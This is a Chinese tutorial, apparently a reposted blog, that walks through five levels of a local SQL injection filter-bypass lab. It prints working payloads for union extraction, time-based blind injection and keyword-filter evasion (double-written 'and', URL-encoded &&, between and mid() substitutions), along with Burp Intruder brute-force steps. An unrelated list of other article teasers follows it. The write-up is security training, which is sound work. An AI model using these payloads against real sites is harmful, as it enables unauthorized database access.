SQL注入【ByPass有点难的靶场实战】(九)

★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

0、总体思路

先确认是否可以SQL注入,使用单双引号,1/0,括号测试 ’ " 1/0 ),页面显示不同内容或响应长度来确定。存在SQL注入后则开始构造轮子进行验证,猜出数据库,用户名,表名,字段名,有没有文件漏洞等。

为方便验证提交拦截到BP,右击到Repeater修改参数值进行验证看响应内容。

特殊字符说明

+表示空格
--表示注释

复制sqli-bypass压缩包到sqli项目下,解压并重命名为bypass,其中里面的数据库dvwa,请参考《靶场环境搭建【XP、pikachu、dvwa、sqli-labs】》的dvwa,启动小皮的Apache和MySQL服务。

1、index1

1.1、判断是否存在SQL注入

正常响应值

在这里插入图片描述

在参数后面拼接上单引号' 发现响应长度有变化,拼接上两个单引号又正常响应长和回显了,因此存在SQL注入。

还有一种方式,就是在知道源码的情况下,可以把语句复制到mysql数据库编辑器比如navcat,去查询,构造确认这样更方便理解SQL注入为什么是这么拼的。
在这里插入图片描述
在这里插入图片描述

由此说明参数是有单引号闭合的,看源码也可确定是单引号包含着,这个是注入构造语句的关键点
在这里插入图片描述

1.2、确定回显字段

使用order by 数字来确定回显字段,发现提示:请勿SQL注入!!!,应该是空格被过滤了

# 注入语句
?id=1+order+by+5--+

在这里插入图片描述

使用注释方式/**/ 拼接看,发现可正常显示,把列数调整到10发现,不回显,不报错,可能是列数不到10,往下调到8正常显示,因此可确定查询的列数是8

# 正常显示
?id=1'/**/order/**/by/**/5%23
# 10列不显示
?id=1'/**/order/**/by/**/10%23
# 8列正常显示,
?id=1'/**/order/**/by/**/10%23

在这里插入图片描述

使用union来确定显示的是哪个列,注意查询参数要不存在的,否则显示是存在的数据,确定显示的列数是第4,5列

?id=-1'/**/union/**/select/**/1,2,3,4,5,6,7,8/**/'

在这里插入图片描述

1.3、联合查询爆出

把第4,5列依次替换成数据名,当前登录名

?id=-1'/**/union/**/select/**/1,2,3,database(),user(),6,7,8/**/'

在这里插入图片描述

2、index2

2.1、判断是否存在SQL注入

同1、index1

2.2、确定回显字段

看源码是过滤了关键字:andor ,同时错误信息不回显出来,所以是盲注,在确定列数时使用order,尝试用大小写 oRder

# 10列不显示信息,往下调整到8正常显示
?id=1'+oRder+by+10--+'

?id=1'+oRder+by+8--+'

在这里插入图片描述

判断哪第几列对应显示,使用union,由于跟index1查相同的列,是第4,5列

# 注入语句
?id=-1'+union+select+1,2,3,4,5,6,7,8--+'

# 关键显示信息
Your Login name:4<br>
Your Password:5   
2.3、联合查询爆出

把第4,5列依次替换成数据名,当前登录名

# 注入语句
?id=-1'+union+select+1,2,3,database(),user(),6,7,8--+'

# 关键显示信息
Your Login name:dvwa<br>
Your Password:root@localhost   

3、index3

3.1、判断是否存在SQL注入

同1、index1

该示例还是可以用order by 的方式来确认查询的列数,再用union联合查询的方式来爆出数据库名,但想用其他方式来验证知识点,所以用下面的方式。

3.2、使用时间盲注

看源码是过滤了关键字:andor ,同时错误信息不回显出来,使用时间盲注来爆破数据库

关键字过滤绕过,尝试采用重复的方式处理
anandd --> and

# 注入语句
?id=1'+anandd+if(1=1,sleep(1),sleep(2))--+'

在这里插入图片描述

3.3、爆破数据库长度
# 输入内容
?id=1'+anandd+if(length(database())=2,1,0)--+'

在Repeater右击发送到Intruder,先清除默认的标志位,自己定位到数字2,这个值任意填写的。Attack Type选择:Sniper,参数设置看截图说明。
在这里插入图片描述

设置Payloads参数

在这里插入图片描述

分析攻击结果
在这里插入图片描述

从爆破结果得到数据库长度是4

3.4、爆破数据库名
# 输入内容
?id=1'+anandd+if(substr(database(),1,1)='a',1,0)--+'

爆破参数设置看截图说明,需要2个参数,第一个是截取的数据库对应的字段索引,第二个是匹配的内容。
在这里插入图片描述

设置Payloads参数
在这里插入图片描述
在这里插入图片描述

分析攻击结果
在这里插入图片描述

从爆破结果得到数据库名是dvwa

4、index4

4.1、判断是否存在SQL注入

同1、index1,只是index4报错信息有抛出来,更方便定位问题。

4.2、使用时间盲注

看源码是过滤了关键字:andor ,错误信息有回显出来,使用时间盲注来爆破数据库

关键字过滤绕过,尝试采用重复的方式处理
anandd --> and

# 注入语句
?id=1'+anandd+if(1=1,sleep(1),sleep(2))--+'

发现有提示,没办法使用双写and的方式
在这里插入图片描述

看源码是在取参数时有做urldecode,所以尝试使用&&替换and方式,再使用在线URL编码工具进行编码

在线编码解码网址:https://www.gjk.cn/urlencode

# 编码前的poc
1'+&&+if(1=1,sleep(1),sleep(2))--+'

# 编码后的poc
1%27%2B%26%26%2Bif%281%3D1%2Csleep%281%29%2Csleep%282%29%29--%2B%27

注意:POC复制到URL那边是接到?id=后面,执行后,发现可行
在这里插入图片描述

4.3、爆破数据库长度
# 编码前的poc,注意X是为了方便编码后定位打标识
1'+&&+if(length(database())=X,1,0)--+'

#编码后的poc
1%27%2B%26%26%2Bif%28length%28database%28%29%29%3DX%2C1%2C0%29--%2B%27

注意:POC复制到URL那边是接到?id=后面

在Repeater右击发送到Intruder,先清除默认的标志位,自己定位到数字X,这个值任意填写的。Attack Type选择:Sniper,参数打标识如下
在这里插入图片描述

设置Payloads参数、分析攻击结果和第3.3关一样的,我就不再截图了。爆出结果数据库长度是4。

4.4、爆破数据库名
# 编码前的poc,注意X,Y是为了方便编码后定位打标识
1'+&&+if(substr(database(),X,1)='Y',1,0)--+'

#编码后的poc
1%27%2B%26%26%2Bif%28substr%28database%28%29%2CX%2C1%29%3D%27Y%27%2C1%2C0%29--%2B%27

注意:POC复制到URL那边是接到?id=后面

爆破参数设置看截图说明,需要2个参数,第一个X是截取的数据库对应的字段索引,第二个Y是匹配的内容。
在这里插入图片描述

设置Payloads参数、分析攻击结果和第3.4关一样的,我就不再截图了。从爆破结果得到数据库名是dvwa

5、index5

5.1、判断是否存在SQL注入

同1、index1,不过index5报错信息也有抛出来,更方便定位问题。

5.2、使用时间盲注

看源码是过滤了很多关键字,错误信息有回显出来,使用时间盲注来爆破数据库

关键字过滤绕过,尝试采用重复的方式处理,成功了
anandd --> and

# 注入语句
?id=1'+anandd+if(1=1,sleep(1),sleep(2))--+'

在这里插入图片描述

5.3、爆破数据库长度
# 尝试使用POC
?id=1'+anandd+if(length(database())=2,1,0)--+'

在这里插入图片描述

发现有报错信息,从报错信息分析出来database()=都被过滤掉了,尝试替换如下

database() --> schema()

# 看源码in也被过滤了,所以用between 4 and 4 来等价 =4 ,由于and也会被过滤,同上面一样采用双写的方式
= 4 --> between 4 anandd 4

# 因此最终可行的POC
?id=1'+anandd+if(length(schema())+between+4+anandd+4,1,0)--+'

在Repeater右击发送到Intruder,先清除默认的标志位,自己定位到两个数字4,这个值任意填写的。Attack Type选择:Pitchfork,参数设置看截图说明。
在这里插入图片描述

设置Payloads参数
在这里插入图片描述
在这里插入图片描述

分析攻击结果,爆出结果数据库长度是4。
在这里插入图片描述

5.4、爆破数据库名
# 尝试使用POC
?id=1'+anandd+if(substr(schema(),1,1)+between+'a'+anandd+'a',1,0)--+'

在这里插入图片描述

发现有报错信息,从报错信息分析出来substr()被过滤掉了,因为上一步骤现在变化点就是函数substr(),尝试使用mid()替换,发现可以,没有报错信息了

# 尝试使用POC
?id=1'+anandd+if(mid(schema(),1,1)+between+'a'+anandd+'a',1,0)--+'

爆破参数设置看截图说明,需要2个参数,第一个是截取的数据库对应的字段索引,第二个是匹配的内容。
在这里插入图片描述

设置Payloads参数
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

分析攻击结果,从爆破结果得到数据库名是dvwa
在这里插入图片描述

6、资料获取和下期内容预告

如果需要sqli-bypass压缩包,请关注我的公众号:大象只为你,回复关键字:bypass靶场。

下期内容将会分享文件上传相关的内容,敬请关注我的公众号,持续更新中…

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/280452.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Unity坦克大战开发全流程——开始场景——设置界面

开始场景——设置界面 step1&#xff1a;设置面板的背景图 照着这个来设置就行了 step2&#xff1a;写代码 关联的按钮控件 监听事件函数 注意&#xff1a;要在start函数中再写一行HideMe函数&#xff0c;以便该面板能在一开始就能隐藏自己。 再在BeginPanel脚本中调用该函数即…

ESP32入门六(读取引脚的模拟信号[2]:信号出现误差的原因)

在之前的章节中&#xff0c;我们测试了用ESP32来接收模拟电压信号&#xff0c;在测试中&#xff0c;读取到的数据与现实存在一定的误差&#xff0c;在这一篇中&#xff0c;我们尝试了解出现误差的原因和解决方法。 对于出现的误差&#xff0c;有多种软件和硬件方面的原因: 一、…

红黑树的删除

导航链接 红黑树的性质     红黑树的旋转、变色     红黑树的插入     红黑树的删除 文章目录 导航链接二叉搜索树如何删除结点&#xff1f;场景一&#xff1a;删除没有孩子的结点场景二&#xff1a;删除有一个孩子的结点场景三&#xff1a;删除有两个孩子的结点 红…

海康visionmaster-分支字符:控制调试模式开关的方

在图的右边分支字符模块有两个分支&#xff0c;通过 C#代码 GetParamValue 函数可以看到调试模 式的相关参数 ModuleInfoList 的值为&#xff1a;4#1#0KaTeX parse error: Expected EOF, got # at position 3: 10#̲0#0。其中分支 4#1#0$的 4 表示模 块 id&#xff0c;1 表示这…

操作系统:可变分区管理

有作业序列&#xff1a;作业A要求42K&#xff1b;作业B要求27K&#xff0c;作业C要求22K&#xff0c;作业和空闲内存区如下图所示&#xff0c;请画出最佳适应算法空闲队列图&#xff0c;并分析最佳适应算法是否适合该作业系列。 答&#xff1a;最佳适应算法是按照空闲块由小到大…

Harmony全局应用生命周期 EntryAbility.ts 讲解

之前 我们说过 page页面的生命周期 组件的生命周期 其实他和uni一样有一个整个应用的生命周期 我们如下图打开EntryAbility.ts 这是我们整个程序app的状态控制 他这里也有几个全局的生命周期 比如 我们手机 点开当前 App 启动 app 会触发 它的 onCreate 生命周期 当我们从手…

前端 js 基础(2)

js For In for in 循环遍历 person 对象每次迭代返回一个键 (x)键用于访问键的值键的值为 person[x] 如果索引顺序很重要&#xff0c;请不要在数组上使用 for in。 索引顺序依赖于实现&#xff0c;可能不会按照您期望的顺序访问数组值。 当顺序很重要时&#xff0c;最好使用 f…

元旦特辑:Note6---选择排序

目录 前言❌ 1. 基本思想⚠️ 2. 直接选择排序&#x1f7e2; 2.1 思路分析✳️ 2.2 代码实现❎ 2.2.1 sort.h 2.2.2 sort.c 2.2.3 test.c 2.3 问题解决❇️ 2.3.1 sort.c修改 2.4 特性总结✅ 3. 堆排序&#x1f535; 3.1 代码实现&#x1f3e7; 3.2 特性总结&…

Centos安装Kafka(KRaft模式)

1. KRaft引入 Kafka是一种高吞吐量的分布式发布订阅消息系统&#xff0c;它可以处理消费者在网站中的所有动作流数据。其核心组件包含Producer、Broker、Consumer&#xff0c;以及依赖的Zookeeper集群。其中Zookeeper集群是Kafka用来负责集群元数据的管理、控制器的选举等。 由…

c++ 简单实用万能异常捕获

多层捕获异常&#xff0c;逐渐严格。并打印出错信息和位置&#xff1a;哪个文件&#xff0c;哪个函数&#xff0c;具体哪一行代码。 #include <stdexcept> // 包含标准异常类的头文件try {int a 2 / 0; }catch (const std::runtime_error& e) {// 捕获 std::runt…

浅谈 JSON 对象和 FormData 相互转换,打通前端与后端的通信血脉

前言 大家都知道&#xff0c;前端在和后台进行交互联调时&#xff0c;肯定避免不了要传递参数&#xff0c;一般情况下&#xff0c;params 在 get 请求中使用&#xff0c;而 post 请求下&#xff0c;我们有两种常见的传参方式&#xff1a; JSON 对象格式和 formData 格式&#x…

AtCoder Beginner Contest 334 G

G.Christmas Color Grid 2&#xff08;枚举&#xff0c;Tarjan&#xff09; 题意&#xff1a; 本题与问题 E E E类似。有一个 H H H行和 W W W列的网格&#xff0c;每个单元格都被涂成红色或绿色。用 ( i , j ) (i,j) (i,j)表示从上到下第 i i i行、从左到右第 j j j列的单元…

UIToolKit使用心得

起因 因为那个uitoolkit自己写了一套graphView&#xff0c;所以想着来用用但是用完之后发现也不过如此 怎么构建自己的组件 我在继承Node之后想修改node的样式该怎么办呢是这样的。先用pick点击默认的node节点元素- 在pick默认创建的node节点之后&#xff0c;可以把它的uxml…

跨境电商迎来综合竞争力比拼时代 五大趋势解读跨境2024

过去几年&#xff0c;跨境电商成为外贸出口增长的一大亮点&#xff0c;随着年底国务院办公厅《关于加快内外贸一体化发展的若干措施》的发布&#xff0c;跨境电商在促进经济发展、助力内外贸一体化发展方面的价值更加凸显。 这是跨境电商变化最快的时代&#xff0c;也是跨境电…

CCSK认证:开启云安全领域的黄金大门

&#x1f31f;你是否对云安全领域充满热情&#xff1f;是否希望提升自己在云安全领域的专业性和竞争力&#xff1f;CCSK认证是你的不二之选&#xff01; &#x1f525;CCSK简介&#xff1a; CCSK是国际云安全联盟&#xff08;Cloud Security Alliance&#xff0c;CSA&#xff…

Vue3-29-路由-编程式导航的基本使用

补充一个知识点 路由配置中的 name 属性 &#xff1a; 可以给你的 路由 指定 name属性&#xff0c;称之为 命名路由。 这个 name 属性 在 编程式导航 传参时有重要的作用。 命名路由的写法如下 &#xff1a; 像指定 path 一样&#xff0c;直接指定一个 name 属性即可。{path:/d…

【已解决】 ubuntu apt-get update连不上dl.google.com

在终端使用apt-get update时&#xff0c;连接dl.google.com超时&#xff0c;一直卡在0%&#xff0c;原因是当前ip无法ping到google&#xff08;墙&#xff09;。 解决方法&#xff1a; dl.google.com国内可用IP 选一个&#xff0c;然后按以下命令操作&#xff1a; cd ~ vim …

RSA加密解密——用shell加密java解密

功能描述 使用shell opensll对明文进行RSA加密&#xff0c;将密文用java的RSA工具对密文解密。这应该是全网第一个同时用到shell和java的RSA加密解密教程。中间有很多坑&#xff0c;都踩过了&#xff0c;可以放心使用代码。 正确的实现流程 shell端 首先生成公钥私钥 &…

飞企互联-FE企业运营管理平台 登录绕过漏洞复现

0x01 产品简介 飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。这个平台可以连接人、链接端、联通内外&#xff0c;支持企业B2B、C2B与O2O等核心需求&#xff0c;为不同行业客户的互联网转型提供支持。 0x02 漏洞概…

大数据Doris(四十五):物化视图选择最优

文章目录 物化视图选择最优 物化视图选择最优 下面详细解释一下第一步最优物化视图是被如何选择出来的。 这里分为两个步骤: 对候选集合进行一个过滤。只要是查询的结果能从物化视图数据计算(取部分行,部分列,或部分行列的聚合)出都可以留在候选集中,过滤完成后候选集合…